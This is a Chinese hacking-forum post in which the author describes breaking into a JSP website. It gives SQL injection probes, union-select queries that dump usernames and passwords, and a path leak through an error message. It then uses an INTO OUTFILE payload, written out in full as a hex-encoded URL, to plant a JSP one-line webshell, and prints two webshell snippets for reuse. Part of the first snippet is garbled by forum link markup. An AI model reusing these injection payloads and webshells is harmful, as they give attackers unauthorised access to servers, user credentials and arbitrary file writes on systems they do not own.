作者：龙儿心[B.H.S.T]

在此特别感谢孤水绕城
搞了了一个jsp站记录下。
注入点

and 1=1 正常
and 1=2报错
order by 3正常 order by 4出错
and 1=2 union select 1,2,user() 显示root用户
and 1=2 union select 1,2,3 from user 返回正常
and 1=2 union select 1,password,dbname from user
爆出用户名跟密码
感谢小k找到后台

可后台没利用的，又返回到这个注入点
今天晚上绕城在就让绕城看了下，最终搞下了。
and 1=2 union select 1,2,3
昨天晚上用工具检测了下不能load_file()，绕城看了下，原来四字段太小了！
昨天晚上用wwwscan扫出来的可以列目录，在目录下访问一个文件
爆出c盘一个路径
C:\tomcat4\work\Standalone\localhost\_\include\help2_jsp.java:42: ')' expected
localhost\_\ 绕城告诉我_这个代表是从webapps目录下的ROOT文件夹
如果非ROOT文件夹就会显示虚拟目录的名称
爆出web路径。然后用into outfile导出一句话
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("[url=file://%22)+request.getparameter(%22f%22))).write(request.getparameter(%22t%22).getbytes());%25/]\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%[/url]>貌似因为一句话体积太大了。导出出错。绕城修改了下
然后执行[url=]%20and%201=2%20union%20select%201,2,0x3C25286E6577206A6176612E696F2E46696C654F757470757453747265616D2822633A2F746F6D636174342F776562617070732F524F4F542F696E636C7564652F7A75697A686F6E672E6A73702229292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E%20from%20mysql.user%20into%20outfile%20'c:/tomcat/webapps/ROOT/1.jsp'[/url]
然后访问 就可以了
模模糊糊的记录了下！
<%(new java.io.FileOutputStream("c:/tomcat/webapps/ROOT/***.jsp")).write(request.getParameter("t").getBytes());%>
跟一般jsp一句话差不多
只要修改对应path就可以了